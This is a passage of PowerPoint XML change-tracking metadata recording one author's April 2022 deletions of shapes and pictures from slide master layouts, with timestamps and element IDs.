            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:06.284" v="140" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="893713840" sldId="2147483700"/>
              <ac:spMk id="38" creationId="{B75CEDAF-9B35-B244-BDC3-8E25466DD827}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:05.042" v="281" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="893713840" sldId="2147483700"/>
              <ac:picMk id="14" creationId="{8B03ABCE-57D0-D849-A0BF-DE80B527E251}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:05.042" v="281" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="893713840" sldId="2147483700"/>
              <ac:picMk id="15" creationId="{CD69A4FD-5642-6546-BCCD-6B3A3C1A7B99}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:06.725" v="141" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="893713840" sldId="2147483700"/>
              <ac:picMk id="40" creationId="{232669C8-D9F7-4C4A-83AF-067A99FF3630}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
      </pc:sldMasterChg>
      <pc:sldMasterChg chg="mod modSldLayout">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:02.128" v="280" actId="6014"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:14.241" v="146" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="3148113651" sldId="2147483702"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:12.956" v="144" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3148113651" sldId="2147483702"/>
              <ac:spMk id="7" creationId="{CFC0854C-57DE-9242-98F0-D8D2BC1DD757}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:12.189" v="143" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3148113651" sldId="2147483702"/>
              <ac:spMk id="8" creationId="{6DEFB773-8237-A54F-B786-B5C19211F108}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:11.632" v="142" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3148113651" sldId="2147483702"/>
              <ac:spMk id="9" creationId="{2325821A-DB9D-424B-B816-E83550502E82}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:14.241" v="146" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3148113651" sldId="2147483702"/>
              <ac:spMk id="37" creationId="{C55AACF5-EF00-CB42-823A-B94F99F731DB}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:13.629" v="145" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3148113651" sldId="2147483702"/>
              <ac:picMk id="39" creationId="{B0D6670B-2380-714D-AD0A-1382FC43D25D}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:20.007" v="149" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="2649955998" sldId="2147483703"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:17.709" v="147" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2649955998" sldId="2147483703"/>
              <ac:spMk id="9" creationId="{B13466A1-2612-0C47-834B-0006755A77F3}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:20.007" v="149" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2649955998" sldId="2147483703"/>
              <ac:spMk id="37" creationId="{83A900FC-E576-CE47-A6BE-5461B0852B4B}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:18.828" v="148" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2649955998" sldId="2147483703"/>
              <ac:picMk id="40" creationId="{3FEFAA72-9F35-7743-A59E-7C7F67C30CA1}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:23.376" v="150" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="2025251701" sldId="2147483704"/>
          </pc:sldLayoutMkLst>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:23.376" v="150" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2025251701" sldId="2147483704"/>
              <ac:picMk id="16" creationId="{E2778E7C-0D3D-4C4D-A654-01C6F5B05609}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:24.823" v="151" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="4052733829" sldId="2147483705"/>
          </pc:sldLayoutMkLst>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:24.823" v="151" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="4052733829" sldId="2147483705"/>
              <ac:picMk id="7" creationId="{32873DA4-0303-2D45-9BCE-792A64D46E3B}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:26.379" v="152" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="3464939645" sldId="2147483706"/>
          </pc:sldLayoutMkLst>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:26.379" v="152" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3464939645" sldId="2147483706"/>
              <ac:picMk id="17" creationId="{2EBF929B-B5C8-584A-B16C-79F28C7ADD67}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:29.208" v="154" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="2497213718" sldId="2147483707"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:29.208" v="154" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2497213718" sldId="2147483707"/>
              <ac:spMk id="18" creationId="{A36E811E-A77C-3A42-8845-C22E4BAD3725}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:28.876" v="153" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2497213718" sldId="2147483707"/>
              <ac:picMk id="19" creationId="{7F793094-995D-044B-A075-55D4B62040C5}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:31.236" v="156" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="583606376" sldId="2147483708"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:31.236" v="156" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="583606376" sldId="2147483708"/>
              <ac:spMk id="19" creationId="{9608F26D-E002-8C4D-BBFB-805BDE88AA9C}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:30.700" v="155" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="583606376" sldId="2147483708"/>
              <ac:picMk id="20" creationId="{F45856B1-6130-6042-B205-F74570E1AFD6}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:35.320" v="158" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="3181993955" sldId="2147483709"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:35.320" v="158" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3181993955" sldId="2147483709"/>
              <ac:spMk id="26" creationId="{3051A866-DE6C-844B-BBB6-8FAE73A09746}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:34.446" v="157" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3181993955" sldId="2147483709"/>
              <ac:picMk id="27" creationId="{767807FE-2972-4D44-858F-8F347054C6C2}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp modSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:37.980" v="161" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="3625037021" sldId="2147483710"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del mod">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:37.980" v="161" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3625037021" sldId="2147483710"/>
              <ac:spMk id="6" creationId="{2398E721-2065-8640-9E19-F292A2EEF689}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:37.399" v="159" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3625037021" sldId="2147483710"/>
              <ac:picMk id="32" creationId="{7D12AFAA-09C5-F94C-959D-7F1A3CA16281}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:39.781" v="163" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="2385149831" sldId="2147483711"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:39.781" v="163" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2385149831" sldId="2147483711"/>
              <ac:spMk id="16" creationId="{A87593FF-48B4-A049-84B0-C3D11BE77E35}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:39.382" v="162" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2385149831" sldId="2147483711"/>
              <ac:picMk id="17" creationId="{A147826A-BD0C-494D-B37E-BFF2D62E5674}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp modSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:41.860" v="166" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="775944981" sldId="2147483712"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del mod">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:41.860" v="166" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="775944981" sldId="2147483712"/>
              <ac:spMk id="16" creationId="{78914796-BB9F-294F-AF4E-88B1127966D7}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:41.462" v="164" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="775944981" sldId="2147483712"/>
              <ac:picMk id="17" creationId="{2FF42187-FFF9-B046-AE0C-E0F21384E1C3}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:43.596" v="168" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="3217745403" sldId="2147483713"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:43.596" v="168" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3217745403" sldId="2147483713"/>
              <ac:spMk id="18" creationId="{8DB0657D-345E-3146-973A-8A4B963C85C4}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:43.262" v="167" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="3217745403" sldId="2147483713"/>
              <ac:picMk id="19" creationId="{B8E0E7A5-8984-8543-8952-9EF63B36FD5E}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:45.573" v="170" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="942251485" sldId="2147483714"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:45.573" v="170" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="942251485" sldId="2147483714"/>
              <ac:spMk id="6" creationId="{C037E905-3A2F-7A47-B6B2-2C14131A1838}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:45.223" v="169" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="942251485" sldId="2147483714"/>
              <ac:picMk id="19" creationId="{99659747-B2F7-3E4C-BDA1-E591D83D3F34}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:49.573" v="172" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="1373600775" sldId="2147483715"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:49.573" v="172" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1373600775" sldId="2147483715"/>
              <ac:spMk id="6" creationId="{C037E905-3A2F-7A47-B6B2-2C14131A1838}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:47.910" v="171" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1373600775" sldId="2147483715"/>
              <ac:picMk id="18" creationId="{61ABF563-A106-2941-99AA-9ACBB4A8BD1C}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp modSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:51.653" v="175" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="707782151" sldId="2147483716"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:51.653" v="175" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="707782151" sldId="2147483716"/>
              <ac:spMk id="36" creationId="{AA167B85-83DB-B243-8DD4-89388138663F}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del mod">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:50.783" v="174" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="707782151" sldId="2147483716"/>
              <ac:picMk id="37" creationId="{9D7B5582-28F6-BF4A-8C11-69C60A8EBD5D}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:52.909" v="177" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="2194750290" sldId="2147483717"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:52.909" v="177" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2194750290" sldId="2147483717"/>
              <ac:spMk id="35" creationId="{E9B5E7B2-C7CB-4744-A960-0F8279B65C80}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
